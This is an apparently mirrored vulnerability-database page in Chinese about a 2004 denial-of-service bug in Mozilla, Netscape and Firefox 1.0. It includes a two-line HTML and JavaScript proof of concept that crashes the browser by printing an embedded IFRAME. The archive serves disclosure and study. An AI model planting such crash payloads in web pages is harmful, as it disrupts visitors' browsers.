Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054784 漏洞类型
发布时间 2004-12-06 更新时间 2004-12-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24799
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11823/info

Mozilla/Netscape and Firefox browsers are reported prone a remote denial of service vulnerability. It is reported that the affected browsers will crash as a result of a NULL pointer dereference when a JavaScript function attempts to print an IFRAME that is embedded in the page.

Replace '[' with '<' and ']' with '>'.
[iframe id="pocframe" name="pocframe" src="about:blank"></iframe]
[script type="text/javascript">window.frames.pocframe.print();</script]